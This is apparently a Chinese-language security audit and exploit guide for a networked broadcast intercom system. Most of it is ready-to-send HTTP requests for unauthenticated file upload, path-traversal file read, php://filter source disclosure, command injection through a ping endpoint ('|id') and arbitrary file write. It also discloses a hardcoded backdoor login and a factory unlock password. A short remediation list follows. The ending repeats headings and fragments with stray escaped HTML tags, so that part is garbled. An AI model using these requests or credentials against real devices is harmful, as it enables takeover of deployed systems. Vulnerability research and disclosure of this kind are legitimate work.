网络广播对讲设备安全审计报告与漏洞利用指南<\/h1>

0x00 系统概述<\/h2>

该网络广播对讲设备系统存在多处严重安全漏洞，包括但不限于：<\/p>

前台任意文件上传<\/li>
前台任意文件读取<\/li>
前台任意命令执行<\/li>
前台任意文件写入<\/li>
前台任意文件下载<\/li>
未授权访问<\/li>

后门账户<\/li> <\/ul>

0x01 前台任意文件上传漏洞<\/h2>

上传点1:

\/upload\/my_parser.php<\/code><\/h3>
漏洞描述<\/strong>：无需认证即可上传任意文件<\/p>
利用方法<\/strong>：<\/p>
POST<\/span> \/upload\/my_parser.php HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> x.x.x.x<\/span>
<\/span><\/span>Content-Type:<\/span> multipart\/form-data; boundary=----WebKitFormBoundaryTj3WLQhN3ZSs0CAg<\/span>
<\/span><\/span>
<\/span><\/span>------WebKitFormBoundaryAgwuKUMd2jB55NEm
<\/span><\/span>Content-Disposition: form-data; name="upload"; filename="info.php"
<\/span><\/span>Content-Type: application\/octet-stream
<\/span><\/span>
<\/span><\/span><?php phpinfo(); ?>
<\/span><\/span>------WebKitFormBoundaryAgwuKUMd2jB55NEm--
<\/span><\/span><\/code><\/pre>上传路径<\/strong>：\/upload\/files\/info.php<\/code><\/p>
上传点2: \/php\/addscenedata.php<\/code><\/h3>
利用方法<\/strong>：<\/p>
POST<\/span> \/php\/addscenedata.php HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> x.x.x.x<\/span>
<\/span><\/span>Content-Type:<\/span> multipart\/form-data; boundary=----WebKitFormBoundaryRdOoAbqBRCt5Bgzj<\/span>
<\/span><\/span>
<\/span><\/span>------WebKitFormBoundaryAgwuKUMd2jB55NEm
<\/span><\/span>Content-Disposition: form-data; name="upload"; filename="info.php"
<\/span><\/span>Content-Type: application\/octet-stream
<\/span><\/span>
<\/span><\/span><?php phpinfo(); ?>
<\/span><\/span>------WebKitFormBoundaryAgwuKUMd2jB55NEm--
<\/span><\/span><\/code><\/pre>上传路径<\/strong>：\/images\/scene\/info.php<\/code><\/p>
简化上传方式<\/strong>：直接访问\/upload\/upload.html<\/code>进行上传<\/p>
0x02 前台任意文件读取漏洞<\/h2>
读取点1: \/php\/getjson.php<\/code><\/h3>
利用方法<\/strong>：<\/p>
POST<\/span> \/php\/getjson.php HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> x.x.x.x<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>jsondata[filename]=..\/php\/test.php
<\/span><\/span><\/code><\/pre>读取点2: \/php\/rj_get_token.php<\/code><\/h3>
基本利用<\/strong>：<\/p>
POST<\/span> \/php\/rj_get_token.php HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>jsondata[url]=test.php<\/span>
<\/span><\/span><\/code><\/pre>使用PHP伪协议读取文件<\/strong>：<\/p>
POST<\/span> \/php\/rj_get_token.php HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>jsondata[url]=php:<\/span>\/\/filter\/read=convert.base64-encode\/resource=backup.php<\/span>
<\/span><\/span><\/code><\/pre>0x03 前台任意命令执行漏洞<\/h2>
漏洞位置<\/strong>：\/php\/ping.php<\/code><\/p>
利用方法<\/strong>：<\/p>
POST<\/span> \/php\/ping.php HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>jsondata[type]=0&jsondata[ip]=|id<\/span>
<\/span><\/span><\/code><\/pre>0x04 前台任意文件写入漏洞<\/h2>
漏洞位置<\/strong>：\/php\/uploadjson.php<\/code><\/p>
利用方法<\/strong>：<\/p>
POST<\/span> \/php\/uploadjson.php HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>jsondata[filename]=..\/ppp.php&jsondata[data]=123<\/span>
<\/span><\/span><\/code><\/pre>0x05 前台任意文件下载漏洞<\/h2>
漏洞位置<\/strong>：\/php\/exportrecord.php<\/code><\/p>
利用方法<\/strong>：<\/p>
GET \/php\/exportrecord.php?downname=test.php
<\/code><\/pre>
0x06 未授权访问漏洞<\/h2>
系统包含多个未授权访问接口：<\/p>


智慧xx系统<\/strong>：<\/p>
\/prison\/index.html
<\/code><\/pre>
<\/li>

系统维护界面<\/strong>：<\/p>
\/html\/system.html
<\/code><\/pre>
<\/li>

厂家维护界面<\/strong>：<\/p>
\/html\/factory.html
<\/code><\/pre>
解锁密码<\/strong>：Rdc070#<\/code><\/p>
<\/li>
<\/ol>
0x07 后门账户<\/h2>
后门账户信息<\/strong>：<\/p>

用户名：administrator<\/code><\/li>
密码：800823<\/code><\/li>
<\/ul>
验证逻辑<\/strong>（位于\/php\/login.php<\/code>）：<\/p>
if<\/span>('800823'<\/span> ==<\/span> $pass &&<\/span> 'administrator'<\/span> ==<\/span> $user) {
<\/span><\/span>    \/\/ 授予管理员权限
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>前端处理逻辑<\/strong>（位于\/js\/index.js<\/code>）：<\/p>
if<\/span>(user<\/span> ==<\/span> "administrator"<\/span> &&<\/span> passwd<\/span> ==<\/span> "800823"<\/span>) {
<\/span><\/span>    isencrypted<\/span> =<\/span> "0"<\/span>; \/\/ 不加密直接验证
<\/span><\/span><\/span><\/span>} else<\/span> {
<\/span><\/span>    \/\/ 其他账户密码需要base64编码并反转
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>0x08 总结与修复建议<\/h2>
漏洞总结<\/h3>

系统大部分接口未做权限验证，无需登录即可访问<\/li>
存在多个文件操作漏洞，可导致系统完全沦陷<\/li>
内置后门账户，攻击者可轻易获取管理员权限<\/li>
<\/ol>
修复建议<\/h3>

对所有接口添加身份验证机制<\/li>
修复文件上传功能，限制文件类型和路径<\/li>
移除后门账户<\/li>
对用户输入进行严格过滤<\/li>
禁用危险函数如system()<\/code>等<\/li>
限制文件操作路径，防止目录穿越<\/li>
更新系统密码策略，禁用硬编码密码<\/li>
<\/ol>
攻击者防御措施<\/h3>

修改默认密码和后门账户密码<\/li>
限制访问\/upload\/<\/code>、\/php\/<\/code>等敏感目录<\/li>
监控系统日志，查找可疑文件上传和命令执行行为<\/li>
考虑升级到最新安全版本或更换更安全的系统<\/li>
<\/ol>

网络广播对讲设备安全审计报告与漏洞利用指南<\/h1>

0x01 前台任意文件上传漏洞<\/h2>

0x08 总结与修复建议<\/h2>

攻击者防御措施<\/h3> 修改默认密码和后门账户密码<\/li> 限制访问\/upload\/<\/code>、\/php\/<\/code>等敏感目录<\/li> 监控系统日志，查找可疑文件上传和命令执行行为<\/li> 考虑升级到最新安全版本或更换更安全的系统<\/li> <\/ol>

攻击者防御措施<\/h3>

修改默认密码和后门账户密码<\/li>
限制访问`\/upload\/<\/code>、\/php\/<\/code>等敏感目录<\/li>`
`监控系统日志，查找可疑文件上传和命令执行行为<\/li>`
`考虑升级到最新安全版本或更换更安全的系统<\/li> <\/ol>`